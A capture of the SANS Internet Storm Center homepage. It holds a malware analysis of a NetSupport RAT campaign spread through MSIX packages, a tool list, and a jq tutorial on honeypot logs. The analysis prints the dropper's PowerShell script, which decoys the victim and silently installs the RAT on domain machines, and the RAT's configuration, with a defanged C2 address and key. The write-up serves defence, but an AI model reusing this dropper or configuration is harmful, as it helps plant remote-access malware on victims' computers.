isc.sans.edu
Open in
urlscan Pro
45.60.31.34
Public Scan
Submitted URL: http://isc.sans.edu/
Effective URL: https://isc.sans.edu/
Submission: On June 18 via manual from US — Scanned from DE
Effective URL: https://isc.sans.edu/
Submission: On June 18 via manual from US — Scanned from DE
Form analysis 1 forms found in the DOM
Name: searchform — GET /search.html
<form id="headerSearch" name="searchform" action="/search.html" method="get">
<input type="text" name="q" placeholder="Search...(IP, Port..)">
<input type="hidden" id="token" name="token" value="">
<input class="btn btn-primary" type="submit" name="Search" value="Search">
</form>Text Content
INTERNET STORM CENTER
Sign In Sign Up
Handler on Duty: Johannes Ullrich
Threat Level: green
Last Daily Podcast (Tue, Jun 18th): NetSupport Campaign; D-Link Backdoor; iTerm2
Vuln; NextCloud Vuln;
Video: OS Command Injection
DIARIES
VIEW ALL
Published: 2024-06-17 by Xavier Mertens
NEW NETSUPPORT CAMPAIGN DELIVERED THROUGH MSIX PACKAGES
It's amazing to see how attackers reuse and combine known techniques to target
their victims with new campaigns! Last week, I spotted some malicious MSIX
packages on VT that drop a NetSupport[1] client preconfigured to phone home to
an attacker's controlled manager. Remote support tools are really "cool" for
attackers because they provide a perfect way to communicate with infected
computers without the need to develop their own C2 infrastructure and protocol!
If some are popular and often searched as evidence of compromise, like AnyDesk
or TeamViewer), there are others, like NetSupport, that tend to remain below the
radar. This one is available for free for 30 days (more than enough to launch a
campaign) and provides all the expected features to interact with victims:
Let's have a look at one example of a malicious MSIX
file: update_12_06_2024_5903695.msix
(SHA256:e77bd0bf2c2f5f0094126f34de49ea5d4304a094121307603916ae3c50dfcfe4). The
file has a very low detection score (4/69)[2]. The file contains all the
components to download and install the NetSupport client:
# zipdump.py update_12_06_2024_5903695.msix
Index Filename Encrypted Timestamp
1 Registry.dat 0 2024-06-12 08:10:20
2 User.dat 0 2024-06-12 08:10:20
3 Assets/logo.png 0 2024-06-12 08:10:20
4 config.json 0 2024-06-12 08:10:20
5 fix.ps1 0 2024-06-12 08:10:20
6 PsfLauncher32.exe 0 2024-06-12 08:10:20
7 PsfLauncher64.exe 0 2024-06-12 08:10:20
8 PsfRunDll32.exe 0 2024-06-12 08:10:20
9 PsfRunDll64.exe 0 2024-06-12 08:10:20
10 PsfRuntime32.dll 0 2024-06-12 08:10:20
11 PsfRuntime64.dll 0 2024-06-12 08:10:20
12 Resources.pri 0 2024-06-12 08:10:20
13 StartingScriptWrapper.ps1 0 2024-06-12 08:10:20
14 VFS/ProgramFilesX64/7z2404-extra/7za.dll 0 2024-06-12 08:10:20
15 VFS/ProgramFilesX64/7z2404-extra/7za.exe 0 2024-06-12 08:10:20
16 VFS/ProgramFilesX64/7z2404-extra/7zxa.dll 0 2024-06-12 08:10:20
17 VFS/ProgramFilesX64/7z2404-extra/arm64/7-ZipFar.dll 0 2024-06-12 08:10:20
18 VFS/ProgramFilesX64/7z2404-extra/arm64/7za.dll 0 2024-06-12 08:10:20
19 VFS/ProgramFilesX64/7z2404-extra/arm64/7za.exe 0 2024-06-12 08:10:20
20 VFS/ProgramFilesX64/7z2404-extra/arm64/7zxa.dll 0 2024-06-12 08:10:20
21 VFS/ProgramFilesX64/7z2404-extra/Far/7-ZipEng.hlf 0 2024-06-12 08:10:20
22 VFS/ProgramFilesX64/7z2404-extra/Far/7-ZipEng.lng 0 2024-06-12 08:10:20
23 VFS/ProgramFilesX64/7z2404-extra/Far/7-ZipFar.dll 0 2024-06-12 08:10:20
24 VFS/ProgramFilesX64/7z2404-extra/Far/7-ZipFar64.dll 0 2024-06-12 08:10:20
25 VFS/ProgramFilesX64/7z2404-extra/Far/7-ZipRus.hlf 0 2024-06-12 08:10:20
26 VFS/ProgramFilesX64/7z2404-extra/Far/7-ZipRus.lng 0 2024-06-12 08:10:20
27 VFS/ProgramFilesX64/7z2404-extra/Far/7zToFar.ini 0 2024-06-12 08:10:20
28 VFS/ProgramFilesX64/7z2404-extra/Far/far7z.reg 0 2024-06-12 08:10:20
29 VFS/ProgramFilesX64/7z2404-extra/Far/far7z.txt 0 2024-06-12 08:10:20
30 VFS/ProgramFilesX64/7z2404-extra/history.txt 0 2024-06-12 08:10:20
31 VFS/ProgramFilesX64/7z2404-extra/License.txt 0 2024-06-12 08:10:20
32 VFS/ProgramFilesX64/7z2404-extra/readme.txt 0 2024-06-12 08:10:20
33 VFS/ProgramFilesX64/7z2404-extra/x64/7za.dll 0 2024-06-12 08:10:20
34 VFS/ProgramFilesX64/7z2404-extra/x64/7za.exe 0 2024-06-12 08:10:20
35 VFS/ProgramFilesX64/7z2404-extra/x64/7zxa.dll 0 2024-06-12 08:10:20
36 VFS/ProgramFilesX64/client2.7z 0 2024-06-12 08:10:20
37 VFS/ProgramFilesX64/PsfRunDll64.exe 0 2024-06-12 08:10:20
38 AppxManifest.xml 0 2024-06-12 08:10:20
39 AppxBlockMap.xml 0 2024-06-12 08:10:20
40 [Content_Types].xml 0 2024-06-12 08:10:20
41 AppxMetadata/CodeIntegrity.cat 0 2024-06-12 08:10:20
42 AppxSignature.p7x 0 2024-06-12 08:10:48
You can see that a portable 7zip version is included in the file. It will be
used to unpack the NetSupport client stored in the client2.7z file. Everything
will happen in fix.ps1:
# zipdump.py update_12_06_2024_5903695.msix -s 5 -d
$url = "https://www.google.com/intl/en_en/chrome/"
Start-Process $url
$domain = Get-WmiObject Win32_ComputerSystem | Select-Object -ExpandProperty Domain
if ($domain -eq "WORKGROUP") {
} else {
cmd /c "VFS\ProgramFilesX64\7z2404-extra\7za.exe e VFS\ProgramFilesX64\client2.7z -oC:\Users\Public\Documents\Client -p88888888"
cmd /c "VFS\ProgramFilesX64\7z2404-extra\7za.exe e C:\Users\Public\Documents\Client\client1.7z -oC:\Users\Public\Documents\Client -p88888888"
$path = "C:\Users\Public\Documents\Client\client32.exe"
Start-Process $path
}
First, the script will open a browser and display the Chrome download page to
defeat the victim. Then, the script will verify if the computer is part of a
Microsoft domain (read: a corporate computer). If not, the client won't be
installed.
The NetSupport client is double-compressed in client2.7z then client1.7z:
# 7z l client1.7z
7-Zip [64] 16.02 : Copyright (c) 1999-2016 Igor Pavlov : 2016-05-21
p7zip Version 16.02 (locale=en_US.UTF-8,Utf16=on,HugeFiles=on,64 bits,2 CPUs Intel(R) Core(TM) i9-9980HK CPU @ 2.40GHz (906ED),ASM,AES-NI)
Scanning the drive for archives:
1 file, 1510337 bytes (1475 KiB)
Listing archive: client1.7z
--
Path = client1.7z
Type = 7z
Physical Size = 1510337
Headers Size = 545
Method = LZMA2:6m BCJ 7zAES
Solid = +
Blocks = 2
Date Time Attr Size Compressed Name
------------------- ----- ------------ ------------ ------------------------
2024-06-12 10:47:36 D.... 0 0 client
2024-06-12 08:07:49 ....A 652 960 client/client32.ini
2007-07-06 13:07:32 ....A 328 client/nskbfltr.inf
2024-06-12 10:49:40 ....A 1369 client/NSM.LIC
2010-04-27 05:26:38 ....A 46 client/nsm_vpro.ini
2016-12-07 00:03:12 ....A 93560 1508832 client/AudioCapture.dll
2024-06-12 10:48:13 ....A 55459 client/client32.exe
2016-04-26 20:55:34 ....A 328056 client/HTCTL32.DLL
2015-04-24 17:27:28 ....A 773968 client/msvcr100.dll
2016-04-26 20:59:04 ....A 33144 client/pcicapi.dll
2016-04-26 20:59:10 ....A 18808 client/PCICHEK.DLL
2023-06-11 18:51:36 ....A 3710280 client/PCICL32.DLL
2023-06-13 13:01:09 ....A 63320 client/remcmdstub.exe
2023-06-13 13:35:38 ....A 391832 client/TCCTL32.DLL
------------------- ----- ------------ ------------ ------------------------
2024-06-12 10:49:40 5470822 1509792 13 files, 1 folders
The client32.ini discloses the IP address of the NetSupport Manager (the C2):
# cat client/client32.ini
0x1c42f29c
[Client]
_present=1
AlwaysOnTop=0
AutoICFConfig=1
DisableChat=1
DisableChatMenu=1
DisableDisconnect=1
DisableMessage=1
DisableReplayMenu=1
DisableRequestHelp=1
Protocols=3
Shared=1
silent=1
SKMode=1
SOS_Alt=0
SOS_LShift=0
SOS_RShift=0
SysTray=0
UnloadMirrorOnDisconnect=0
Usernames=*
ValidAddresses.TCP=*
[_Info]
Filename=C:\Users\Public\Pictures\client32u.ini
[_License]
quiet=1
[Audio]
DisableAudioFilter=1
[General]
BeepUsingSpeaker=0
[HTTP]
CMPI=60
GatewayAddress=38[.]135[.]52[.]140:443
GSK=GK;OAKDA9C<I?PBGFF9F>D@KHF:J<P
SecondaryGateway=
SecondaryPort=443
[TCPIP]
MulticastListenAddress=
The C2 server (down at this time) is 38[.]135[.]52[.]140 and uses HTTPS. GSK is
the shared key used to encrypt communications.
Note the first line (the hex value): It's a checksum of the configuration file.
Any change in the file will make it unusable. But, NetSupport has a great
support tool called cksini.exe that helps to generate the checksum of a manually
edited configuration file:
C:\Temp>cksini
Generate checksum for .INI file
Checksum is: 0xfbaa0e3e
Output is in file: client32.ini
Malicious MSIX files are not new[3], NetSupport has already been heavily used by
attackers in the past[4] but they remain a very good combination to compromise
more victims and... at a very low cost for attackers!
[1] https://www.netsupportmanager.com
[2] https://www.virustotal.com/gui/file/e77bd0bf2c2f5f0094126f34de49ea5d4304a094121307603916ae3c50dfcfe4
[3] https://isc.sans.edu/diary/Redline+Dropped+Through+MSIX+Package/30404
[4] https://isc.sans.edu/diary/sczriptzzbn+inject+pushes+malware+for+NetSupport+RAT/29170
Xavier Mertens (@xme)
Xameco
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key
Xavier Mertens
Published: 2024-06-15 by Didier Stevens
OVERVIEW OF MY TOOLS THAT HANDLE JSON DATA
I wrote a couple of diary entries showing my tools that produce and consume JSON
data. Like "Analyzing PDF Streams", "Another PDF Streams Example: Extracting
JPEGs" and "Analyzing MSG Files".
The tools than can produce MyJSON output (option –jsonoutput) to stdout are:
* base64dump.py
* cut-bytes.py
* emldump.py
* file-magic.py
* myjson-transform.py
* oledump.py
* pdf-parser.py
* rtfdump.py
* zipdump.py
The tools than can accept MyJSON input (option –jsoninput) from stdin are:
* 1768.py
* amsiscan.py
* base64dump.py
* file-magic.py
* format-bytes.py
* hash.py
* isodump.py
* onedump.py
* pdftool.py
* pngdump.py
* search-for-compression.py
* strings.py
* xmldump.py
The tools than only accept MyJSON input from stdin are:
* myjson-transform.py
* myjson-filter.py
And if you want to write your own program that can process MyJSON data, my
Python program template for binary files process-binary-files.py also supports
this format.
Didier Stevens
Senior handler
blog.DidierStevens.com
Didier Stevens
Published: 2024-06-13 by Guy Bruneau
THE ART OF JQ AND COMMAND-LINE FU [GUEST DIARY]
[This is a Guest Diary by Kaela Reed, an ISC intern as part of the SANS.edu BACS
program]
Viewing logs from a command-line can make it difficult to extract meaningful
data if you’re unfamiliar with the utilities. While there is a learning curve to
working with command-line utilities to sort through logs, they are efficient,
flexible, and easy to incorporate into scripts. Using tools like jq, cut, sort,
and wc, we can extract details from logs to gather statistics and help us build
context from attacks.
What is JSON?
JavaScript Object Notation (JSON) is a log format that is a lightweight and
structured data-interchange format [1]. JSON is a common format used for logs
and APIs because it’s easy for machines to parse. The simple structure also
makes it easy for humans to read, especially when used in conjunction with a
utility called jq (JSON Query), which we will revisit after we cover the basics
of JSON.
Objects
JSON uses curly braces to hold “objects,” which contain unordered key/value
pairs [2]. A key/value pair is separated by a colon and each key/value pair is
separated by a comma. You might recognize this format if you’ve ever decoded a
JWT (JSON Web Token):
{
"alg": "HS256",
"typ": "JWT"
}
Arrays
JSON also uses ordered lists called “arrays” which can be contained within
objects:
{
"method": "POST",
"url": "/aws/credentials",
“useragent”: [
"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko)
Chrome/81.0.4044.129 Safari/537.36"
] }
JQ to the Rescue
The jq tool is a free, open-source JSON processor written in portable C
programming and has no runtime dependencies. It’s easy to parse and filter
through JSON logs with jq and it’s already packaged in major distributions of
Linux, but you can also download it [3].
Extracting Data from Logs
If we read a JSON file using the cat utility in Linux, it can be difficult to
sort through the information:
This is where jq comes in handy! Using jq, we can interact with the data from
JSON logs in a meaningful way.
To read a JSON log with jq, we can either cat the file and pipe it through jq,
or use the command:
jq . <filename>
Using jq with JSON logs makes it easier for the reader to sort through the data.
However, simply printing the log to the screen isn’t enough to extract
meaningful information when you’re dealing with large log files and thousands or
more records to sort through.
Finding Keys
Recall that JSON consists of key/value pairs. We can list all the keys in a JSON
file to help us extract specific information later:
cat logs/web/webhoneypot-2024-04-20.json | jq 'keys'
Source IPs
There’s a key named “sip” which stores source IP addresses. We can filter data
by using dot notation with .<field name> [4]. To extract the source IPs from the
JSON file, we can use .sip. Let’s look at all the source IPs in the log file by
using jq, then pipe it to sort and remove the quotation marks in the output:
cat honeypot/logs/web/webhoneypot-2024-04-20.json | jq '.sip' | sort -u | tr -d
"\""
Even better, we could use jq -r for raw output instead of using the tr utility
to get rid of the quotation marks.
cat honeypot/logs/web/webhoneypot-2024-04-20.json | jq -r '.sip' | sort -u
Piping the previous command to wc -l, we can count how many lines there are,
which will also tell us how many source IP addresses we have:
cat honeypot/logs/web/webhoneypot-2024-04-20.json | jq -r '.sip' | sort -u | wc
-l
Extracting URIs
URIs are stored in the field name "url." The following command will print every
URI in the log on separate lines:
cat logs/web/webhoneypot-2024-04-20.json | jq '.url'
Piping the previous command to wc -l, we can count the number of URIs, which is
105,218. That’s a lot!
However, if we pipe the jq command to sort, we will see there are duplicate
values. Many of the same URIs were visited multiple times and from multiple IP
addresses.
To extract a list of unique URIs and get rid of the duplicates, we can follow
the same method in the last example by sorting the URIs, but pipe the command
through sort or uniq.
We have 510 unique URIs visited!
Extracting Multiple Elements
We can also extract multiple elements and separate them into objects:
cat logs/web/webhoneypot-2024-04-20.json | jq 'select(.sip == "75.101.186.148")
| {time, sip, url}' > dirb-attack.json
Alternative Ways with Arrays
Why did the programmer quit his job?
Because he didn’t get arrays!
In JSON, we can convert fields into different data types. In the last example,
we extracted multiple elements and placed them into objects. We could also
extract multiple elements and convert them to arrays:
cat honeypot/logs/web/webhoneypot-2024-04-20.json | jq 'select(.sip ==
"75.101.186.148") | [.time, .sip, .url]'
With arrays, we can access the data with an index number. If we want to look at
the 3rd element, which consists of URIs, we can reference the index value. With
indexing, the first element starts at 0, so if we want to look at the 3rd
element, we need to use an index of 2. We can then pipe that to sort -u to sort
unique URIs alphabetically:
cat honeypot/logs/web/webhoneypot-2024-04-20.json | jq 'select(.sip ==
"75.101.186.148") | [.time, .sip, .url]' | jq -r .[2] | sort -u
We can also grab only the URIs, join each one with a new line, sort and count
how many unique URIs there are:
cat honeypot/logs/web/webhoneypot-2024-04-20.json | jq -r 'select(.sip ==
"75.101.186.148") | [.url] | join("\n")' | sort -u | wc -l
Converting to CSV Format
We can take different fields from JSON and convert that data into a CSV format
[5]. Let’s take the "time", "sip" and "url" fields, then convert the data to a
CSV and open it in a spreadsheet editor.
cat honeypot/logs/web/webhoneypot-2024-04-20.json | jq -r 'select(.sip ==
"75.101.186.148") | [.time,.sip,.url] | @csv' > attack.csv
What is Directory Busting?
In the following example, we’re going to extract useful information from a
directory busting attack that came from one specific IP address, but first, what
is directory busting?
Directory Busting (Forced Browsing) is a technique used to discover hidden
webpages and files on a webserver [6]. This can be done manually by sending HTTP
requests to the server requesting common page names and files, however, this is
often performed with automated tools and scripts. Automation allows for hundreds
or thousands of requests to different URIs in a short period of time. The goal
of this kind of attack is to discover sensitive information, map the attack
surface, and identify interesting pages (like administrative login pages) that
could contain vulnerabilities.
Finding How Many Unique URIs an Attacker Probed
Let’s first look at all entries from the attacker’s IP and send that the output
to a separate JSON file:
cat webhoneypot-2024-04-20.json | jq 'select(.sip == "75.101.186.148")’ >
ip_75.101.186.148.json
If we want to make sure this worked, we can list all the source IPs in the new
file we created to make sure the logs are only from the attacker IP address
75.101.186.148:
cat ip_75.101.186.148.json | jq -r '.sip' | sort -u
Perfect! The new file only contains logs from the source IP of 75.101.186.148.
If we use the wc utility, we see there are 104,196 entries from that one IP!
Looking at the time stamps, these attacks occurred in a very short amount of
time (roughly 5 minutes). This is typical in an automated attack like directory
busting.
Let’s pipe the URIs through sort, then count how many different URIs were probed
by this attacker:
cat ip_75.101.186.148.json | jq '.url' | sort -u | wc -l
The attacker IP 75.101.186.148 probed 452 unique URIs on the webserver. Looking
at the Internet Storm Center’s Report on the attacker IP, that is an accurate
number [7]. Although directory busting attacks can be accomplished with
brute-force techniques, these are usually accomplished as dictionary attacks.
The threat actor has been reported multiple times and has probed the same number
of unique URLs each time, so the attacker is likely using the same wordlist to
perform the directory busting attack:
The previous commands in the directory busting scenario were run separately, but
could have been performed with one command to achieve the same result:
cat honeypot/logs/web/webhoneypot-2024-04-20.json | jq 'select(.sip ==
"75.101.186.148") | (.url)' | sort -u | wc -l
Conclusion
These examples weren’t the only ways we could’ve arrived with the same outcome.
This is the wonderful thing about using command-line fu! There isn’t just ONE
way to reach the same answer and that’s part of what can make log analysis
within the command-line fun! We’ve merely scratched the surface with jq, but
there is a website you can go to paste JSON data and practice with jq, called JQ
Play [8].
Keep practicing the art of command-line fu, grasshopper!
Cheat Sheet
[1] JSON.org. “Introducing JSON.” Json.org, www.json.org/json-en.html. Accessed
28 May 2024.
[2] w3schools. “JSON Syntax.” W3schools.com, 2019,
www.w3schools.com/js/js_json_syntax.asp. Accessed 28 May 2024.
[3] jqlang.io. “Download jq,” jqlang.github.io.
https://jqlang.github.io/jq/download. Accessed May 28, 2024).
[4] “How to Use JQ to Process JSON on the Command Line.” Linode Guides &
Tutorials, 5 Nov. 2021,
www.linode.com/docs/guides/using-jq-to-process-json-on-the-command-line/.
Accessed 28 May 2024.
[5] Ramanujam, Sriram. “How to Convert JSON to CSV in Linux.” Baeldung, 13 Dec.
2023, www.baeldung.com/linux/json-csv. Accessed 28 May 2024.
[6] OWASP. “Forced Browsing.” Owasp.org,
owasp.org/www-community/attacks/Forced_browsing. Accessed 28 May 2024.
[7] Internet Storm Center. “IP Info: 75.101.186.148.” SANS Internet Storm
Center, https://isc.sans.edu/ipinfo/75.101.186.148. Accessed 28 May 2024.
[8] jqlay. “Jq Play.” Jqplay.org, jqplay.org. Accessed 28 May 2024.
[9] https://www.sans.edu/cyber-security-programs/bachelors-degree/
-----------
Guy Bruneau IPSS Inc.
My Handler Page
Twitter: GuyBruneau
gbruneau at isc dot sans dot edu
Guy Bruneau
PODCASTS
VIEW ALL
ISC STORMCAST FOR TUESDAY, JUNE 18TH, 2024
Released: 2024-06-18 02:00:02
A daily summary of cyber security news from the SANS Internet Stormcenter
Listen Now
ISC STORMCAST FOR MONDAY, JUNE 17TH, 2024
Released: 2024-06-17 02:00:02
A daily summary of cyber security news from the SANS Internet Stormcenter
Listen Now
ISC STORMCAST FOR FRIDAY, JUNE 14TH, 2024
Released: 2024-06-14 02:00:02
A daily summary of cyber security news from the SANS Internet Stormcenter
Listen Now
ISC STORMCAST FOR THURSDAY, JUNE 13TH, 2024
Released: 2024-06-13 02:00:02
A daily summary of cyber security news from the SANS Internet Stormcenter
Listen Now
ISC STORMCAST FOR WEDNESDAY, JUNE 12TH, 2024
Released: 2024-06-12 02:00:02
A daily summary of cyber security news from the SANS Internet Stormcenter
Listen Now
ISC STORMCAST FOR TUESDAY, JUNE 11TH, 2024
Released: 2024-06-11 02:00:02
A daily summary of cyber security news from the SANS Internet Stormcenter
Listen Now
ISC STORMCAST FOR MONDAY, JUNE 10TH, 2024
Released: 2024-06-10 02:00:02
A daily summary of cyber security news from the SANS Internet Stormcenter
Listen Now
JOBS
VIEW ALL
Sony Pictures • Culver City, CA
EXECUTIVE DIRECTOR, SECURITY ARCHITECTURE
GCIA, GCWN, GMON, GDSA
View Details Apply Now
Sony Pictures • Culver City, CA (Hybrid)
SR. IAM & CONTINGENT WORKER FUNCTIONAL ANALYST
SSAP, GSLC
View Details Apply Now
Sony Pictures • Culver City, CA
IAM OPERATIONS LEAD (IT)
SSAP, GSLC, GSTRT
View Details Apply Now
LCCU • Durham, NC
SR. INFORMATION SECURITY ANALYST
GFCI, GMON, GDSA, GSEC, GISF
View Details Apply Now
ADP • Roseland, NJ Hybrid
SENIOR CYBER SECURITY ANALYST
GSEC, GCIA, GCIH, GREM, GCFE, GCFA
View Details Apply Now
Pacific Gas and Electric Company • Concord, CA
EXPERT CYBER INCIDENT RESPONDER
GIAC GCIH, GMON, GCFA, GCFE, GREM, GICSP, GRID
View Details Apply Now
TD SYNNEX • Barcelona, Spain
SENIOR DETECTION AND AUTOMATION ENGINEER (SIEM / SOAR)
GCFE,GCFA,GCIH,GCFR,GNFA,GEIR,GCIA,GDSA,GDAT,GMON,GCDA,GCED,GSOC
View Details Apply Now
ADP • Roseland NJ
LEAD INCIDENT RESPONSE ANALYST
GCIH GCIA GCFA GSEC GREM GCFE
View Details Apply Now
Ramsey Solutions • Franklin, TN
SR INFORMATION SECURITY RISK ANALYST
GSNA
View Details Apply Now
Lubrizol • Wickliffe, OH, US, 44092 / Deer Park, TX, US, 77536
DATA PROTECTION LEAD
GDSA or other GIAC certifications
View Details Apply Now
MetLife • Cary, NC
INFRASTRUCTURE VULNERABILITY ASSESSMENT CONSULTANT
GISF, GSEC, GCED, GPEN, GXPN, GCIH, GPYC, GCLD, GCPN, or other GIAC
View Details Apply Now
CACI • Washington, DC
CLOUD ARCHITECTS AND ENGINEERS
GCIH, GPEN
View Details Apply Now
WIN Technology • Eau Claire, Wisconsin (USA)
INFORMATION SECURITY ENGINEER
GCIH, GPEN, GWAPT, GAWN, GDAT, GMON, GCED, GSIP, GCFA, GCCC, and other GIAC
View Details Apply Now
*
* Homepage
* Diaries
* Podcasts
* Jobs
* Data
* TCP/UDP Port Activity
* Port Trends
* SSH/Telnet Scanning Activity
* Weblogs
* Threat Feeds Activity
* Threat Feeds Map
* Useful InfoSec Links
* Presentations & Papers
* Research Papers
* API
* Tools
* DShield Sensor
* DNS Looking Glass
* Honeypot (RPi/AWS)
* InfoSec Glossary
* Contact Us
* Contact Us
* About Us
* Handlers
* About Us
Slack Channel
Mastodon
Bluesky
X
Have you seen our swag? Buy SANS ISC Gear
© 2024 SANS™ Internet Storm Center Developers: We have an API for you!
* Link To Us
* About Us
* Handlers
* Privacy Policy
*
*
*
*
*